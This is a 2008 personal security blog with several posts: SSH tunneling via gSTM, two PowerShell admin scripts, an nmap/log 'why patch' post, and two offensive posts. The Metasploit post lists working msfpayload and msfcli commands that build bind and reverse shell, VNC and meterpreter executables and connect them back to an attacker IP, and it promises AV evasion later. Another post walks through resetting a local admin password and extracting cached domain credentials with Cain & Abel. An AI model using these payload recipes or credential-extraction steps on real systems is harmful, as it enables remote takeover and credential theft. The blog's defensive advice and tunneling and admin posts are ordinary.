Saturday, October 25, 2008

SSH Tunneling the Pretty Way

This is just a quick post about a nice little tool I found that allows you to setup and save your SSH tunnels and then quickly bring them up when required. Why might you want to do this? Well theres plenty of reasons. They range from it feels geeky, to you're paranoid about those kids in the coffee shop with the "Hack Naked" stickers on there laptops, to just because you can.

Now this guide does assume that you have a SSH server that you can get too and its running Privoxy on port 8118.

The tool is Gnome SSH Tunnel Manager (gSTM) and is available from http://gstm.sourceforge.net the repositories.

apt-get install gstm

Now, a quick reminder of the manual way:

ssh -NL 8118:localhost:8118 synjunkie@ssh_server_ipaddress

Then point your browsers proxy at localhost:8118

And now the pretty way.

Create The Tunnel

Open gSTM from Applications > Internet Menu, and enter your SSH server details. Click Add to configure the port redirection settings and click OK.



Save the settings by clicking OK.



Now you have a tunnel that is saved for you and can be started by Clicking on the Start Button.


Configure The Browser

Now you need to tell Firefox to use your tunnel. Open Firefox Preferences from the Edit menu in Firefox and amend the network proxy settings.



Now you can safely browse the web

You could make this even more seamless by adding a Firefox extension to allow you to have multiple proxy configurations set up and simply select which one you want using drop down list on the toolbar. Switch Proxy works well for this.


Check The Tunnel

You can test that your traffic is being tunneled by using Netstat, Etherape, TCPDump or a number of other tools. Bellow I have used Netstat.



I can see that I am making connections to local port 8118 and that the only external web traffic is going to my SSH server.

When I used Etherape to check my traffic I saw that DNS was not tunneled so one thing to bear in mind is that if your attacker is using subverting your DNS, The whole tunnel will not work. Which I guess is better than it working and your data being stolen!


See my previous post for more details on tunneling without a GUI

Tuesday, October 21, 2008

Incident Response - Finding Modified Files

Following an incident it is useful to look at a server or PC and see what files have changed. If you know the timeframe when an incident took place the following PowerShell script may be of use.

It can be run on a remote system (as long as you have permissions), will prompt you for dates to search (from and to) and will save the results to a file of your choosing.

Here's the script.

#Find-Files.ps1
$1 = (read-Host "Enter start date e.g yyyy/mm/dd")
$2 = (read-Host "Enter finish date e.g yyyy/mm/dd")
$path = (Read-Host "Enter path of target e.g \\server\c$\windows\")
$results = (Read-Host "Where do you want the results saved to? e.g c:\temp\")
$start = [datetime]$1
$end = [datetime] $2
$period = {$_.lastwritetime -gt $start -and $_.lastwritetime -lt $end}
gci $path -Recurse | where {!$_.psiscontainer -and (.$period)} | Out-File -Width 255 $Results


I hope this is of use to someone else.

Thanks to the guys from the forums on www.powershellcommunity.org who helped me with this.

Friday, October 17, 2008

Metasploit Payloads - msfpayload

This entry is really just a place for me to keep notes on working msfpayload details. I will expand on this post as i get more working examples.

These payloads will be detected by AV, I will cover methods of avoiding AV detection in another post.

In my examples 192.168.1.110 is the victim, and 192.168.1.112 is the attacker. Where I have not specified the port it will default to 4444.


1. For a listening shell on the target

Create payload:
./msfpayload windows/shell_bind_tcp LPORT=2482 X > /tmp/Listen-shell.exe

Target:
run Listen-shell.exe

Hacker:
nc 192.168.1.110 2482



2. For a reverse shell on the target

Create payload:
./msfpayload windows/shell/reverse_tcp LHOST=192.168.1.112 X > /tmp/reverse-shell.exe

Hacker:
./msfcli exploit/multi/handler PAYLOAD=windows/shell/reverse_tcp LHOST=192.168.1.112 E

Target:
run reverse-shell.exe



3. For a VNC listener on target

Create payload:
./msfpayload windows/vncinject/bind_tcp LPORT=2482 X > Listen-vnc.exe

Target:
run Listen-vnc.exe

Hacker:
./msfcli exploit/multi/handler PAYLOAD=windows/vncinject/bind_tcp LPORT=2482 RHOST=192.168.1.110 DisableCourtesyShell=TRUE E



4. For a reverse VNC session

Create payload:
./msfpayload windows/vncinject/reverse_tcp LHOST=192.168.1.112 LPORT=2482 X > /tmp/reverse-vnc.exe

Hacker:
./msfcli exploit/multi/handler PAYLOAD=windows/vncinject/reverse_tcp LHOST=192.168.1.112 LPORT=2482 DisableCourtesyShell=TRUE E

Target:
run reverse-vnc.exe



5. For a meterpreter listener

create payload:
./msfpayload windows/meterpreter/bind_tcp LPORT=2482 X > met-listen.exe

Target:
run met-listen.exe

Hacker:
./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/bind_tcp RHOST=192.168.1.110 LPORT=2482 E



6. For a reverse meterpreter connection (not working yet. not sure why)

Create payload:
./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.112 X > /tmp/met-reverse.exe

Hacker:
./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.1.112 E

Target:
run met-reverse.exe


UPDATE: Payload should for 6 should read:

./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.112 LPORT=4444 X > /tmp/met-reverse.exe



This post was inspired by pauldotcom.

Wednesday, October 15, 2008

Why Patch?

This morning I was looking through my SSH server logs and as usual I saw the standard brute force attempts. I thought I would spend a few minutes looking at why certain IP's had nothing better to do than to through some lame ass dictionary attack at me.

So first I would SSH into my box and grep through the logs for failed login attempts.

grep -i failed /var/log/auth.log | less




First I took just one IP from my logs, and Nmap'd it (well they started it!). I found a single SSH port open running a vulnerable version of OpenSSH.

nmap -F 199.33.132.127 -PN



Okay, so using nmap fast scan (looking for the most common ports) I see that port 22 is open.

Now I used a really great website called clez.net to look at the port in more detail.



This site gives me the SSH version and plenty of other intresting info.

So now if I google the SSH version I quickly find that it's an old vulnerable version (OpenSSH 3.9p1).



So it would seem that some poor sucker has got his box owned and now he is scanning my box.

So that's it really. I just wanted to demonstrate to anyone who might read this why it is important to patch.

Friday, October 10, 2008

Why Physical Access Wins

I have just had a job explaining to friend that allowing physical access to a PC can reveal quite alot. Even if the PC is off. His problem was understanding that not only can an attacker access all of the information on that PC he can also extract the passwords of anyone who has logged onto it in the past.

So in the scenario where an administrator has logged onto a laptop in the workplace, then the employee takes the laptop home and an unauthorized person has access to the laptop it is relatively easy to reset the local admin password to provide the attacker with admin access to the laptop and from there he can load up some free software and pull off the cached credentials of anyone who has accessed the laptop, such as the administrator from the office.

Obviously it's not just attackers who could do this, a rogue employee could quite easily create a situation where someone with higher levels of access must log onto their PC and then take that laptop home and extract the password that was used.


Tools

  • NTPasswd
  • Cain & abel

So if the attacker was the employee, he can see who and when another user has logged on to their PC by looking at the Documents and Settings folder and seeing what profiles are created.


Next (this is assuming a standard employee doesn't have admin rights to the PC), after creating a boot disk for a utility such as NTpasswd the PC can be booted with it and the local administrator password can be changed.



After booting up and logging in as the local administrator, the attacker could load a tool such as Cain & Abel and extract the hashes of the cached credentials from that PC.





And then crack them using a number of different methods.



It really is that simple.

Another great tool (although not free) for extracting cached credentials is Elcomsoft's Proactive System Password Recovery tool.

Below is a screenshot of that tool in action on the same PC.





Prevention

Well it's really hard to prevent a rogue employee from doing things like this but things like not giving Domain Admin rights to IT support personnel, and only have an account with domain admin rights to perform domain admin tasks will help. Extra strong password on those accounts is also a really good option. For unauthorized people accessing those laptops, BIOS and boot passwords will make the job harder for them and of course full disk encryption would help loads.

Thats it for this short post.


Links
http://home.eunet.no/pnordahl/ntpasswd/
http://www.oxid.it/
http://www.elcomsoft.com/pspr.html

Thursday, October 9, 2008

WAN Status with PowerShell

Recently I was looking at the talking ping script I blogged about a few weeks ago and I wanted to see how I could make it more useful whilst extending my knowledge of PowerShell. Well here's what I came up with.

Below is a script that will prompt for a server list, loop though the servers and ping them. Depending on the response it'll display a little data about the health of the link or the speed of the link.There is even an option that allows you to speed up the ping or slow it down. I found this usful to leave running in the background and after a day I had only sent 4kbps of ICMP data which is pretty low considering the usefulnes of the realtime information I had.

What I'm looking at in the script is firstly the response times and then the statuscodes. The response times will tell me how long the echo response takes in milliseconds, and the stauscode will tell me if the is a problem such as destination host unreachable or TTL expired in transit etc..


Below is the list of sites that I am pinging in this example but typically this would be a list of servers across multiple sites.



The output from a fast ping (speed was 250) can be seen below. I have inluded the time in the output which I figured is pretty useful as I wouldn't just be sitting there staring at the output.



As you can see, if you only have a few servers the output will pretty soon fill up. I have also colour coded the output so my eyes are drawn to the important output (once you get use to the colours that is).


So here I have slowed the scan right down (speed 10000) which takes almost 2 minutes to get through the small list of servers I have here.




Okay, and now here's the code. Please remember, I'm still very new to PowerShell and although this is functional, I know in a years time I'll look back and see how crap it is and how I probably could have done it with half the code.

# Script to test for responsiveness of hosts to pings and identify network problems
#
$Serverlist = Read-Host "Give me a server list dude!"
$PingSpeed = Read-Host "How fast shall I ping (150 is fast, 1000 is slow)"
Write-Host "Press Ctr + C to quit"
function Ping-Network {
BEGIN {}
PROCESS {
#
$Time = [DateTime]::now
#
$results = gwmi -query "SELECT * FROM Win32_PingStatus WHERE Address = '$computer'"
#
#Testing Speed
if ($results.responsetime -gt 3500)
{Write-Host "$time $computer link is getting screwed! >2500ms" -BackgroundColor red -fore white}
#
if ($results.responsetime -gt 2000)
{Write-Host "$time $computer link is getting hammered! >2000ms" -ForegroundColor pink}
#
if ($results.responsetime -gt 350)
{Write-Host "$time $computer link is very slow >350ms" -ForegroundColor yellow}
#
if ($results.responsetime -gt 250)
{Write-Host "$time $computer link is very slow >250ms" -ForegroundColor cyan}
#
elseif ($results.responsetime -gt 50)
{Write-Host "$time $computer link isn't great >50ms" -ForegroundColor green}
#
# Testing errors
elseif ($results.statuscode -eq 11010)
{Write-Host "$time Ping to $computer timed out" -ForegroundColor red}
#
elseif ($results.statuscode -eq 11002)
{Write-Host "$time Ping to $computer Failed. Destination net unreachable" -BackgroundColor red}
#
elseif ($results.statuscode -eq 11003)
{Write-Host "$time Ping to $computer Failed. Destination host unreachable" -BackgroundColor red}
#
elseif ($results.statuscode -eq 11013)
{Write-Host "$time Ping to $computer Failed. TTL expired in transit" -fore white -BackgroundColor red}
#
elseif ($results.statuscode -eq 11018)
{Write-Host "$time Ping to $computer Failed. Bad destination" -fore white -BackgroundColor red}
#
elseif ($results.statuscode -eq 11012)
{Write-Host "$time Ping to $computer Failed. Bad route" -fore white -BackgroundColor red}
#
elseif ($results.statuscode -eq 11008)
{Write-Host "$time Ping to $computer Failed. Hardware error" -fore white -BackgroundColor red}
#
elseif ($results.statuscode -eq 11009)
{Write-Host "$time Ping to $computer Failed. Packet too big" -fore white -BackgroundColor red}
#
elseif ($results.statuscode -eq 11011)
{Write-Host "$time Ping to $computer Failed. Bad request" -fore white -BackgroundColor red}
#
elseif ($results.statuscode -eq 11001)
{Write-Host "$time Ping to $computer Failed. Buffer too small" -fore white -BackgroundColor red}
#
elseif ($results.statuscode -eq 11016)
{Write-Host "$time Ping to $computer Failed. Source Quench" -fore white -BackgroundColor red}
#
elseif ($results.statuscode -eq 11017)
{Write-Host "$time Ping to $computer Failed. Option too big" -fore white -BackgroundColor red}
#
elseif ($results.statuscode -eq 11050)
{Write-Host "$time Ping to $computer Failed. General failure" -fore white -BackgroundColor red}
#
elseif ($results.statuscode -eq 11032)
{Write-Host "$time Ping to $computer Failed. Negotiating IPSEC" -fore white -BackgroundColor red}
#
elseif ($results.statuscode -eq 11014)
{Write-Host "$time Ping to $computer Failed. Destination protocol unreachable" -fore white -BackgroundColor red}
#
elseif ($results.statuscode -ne 0)
{Write-Host "$time $computer may be down" -fore white -BackgroundColor red }
#
# These lines have been disabled as I don't really need to know if the link is okay,
# I only want to know about problems.
#elseif ($results.statuscode -eq 0)
#{Write-Host "$time $computer is good"}
}
END {}
}
#Loop through the function
$loop = 1
#
do {$computers = (Get-Content $serverlist)
foreach ($computer in $computers) {
if (Ping-Network $computer) {
}
# Slow down the network pings by increasing the start-sleep value.
Start-Sleep -Milliseconds $PingSpeed
}}
until ($loop -gt 2)


I know there are a load of programs that can do this but it was an easy PowerShell project and I can easily tweak it to suit my needs. I hope this might be useful to someone else.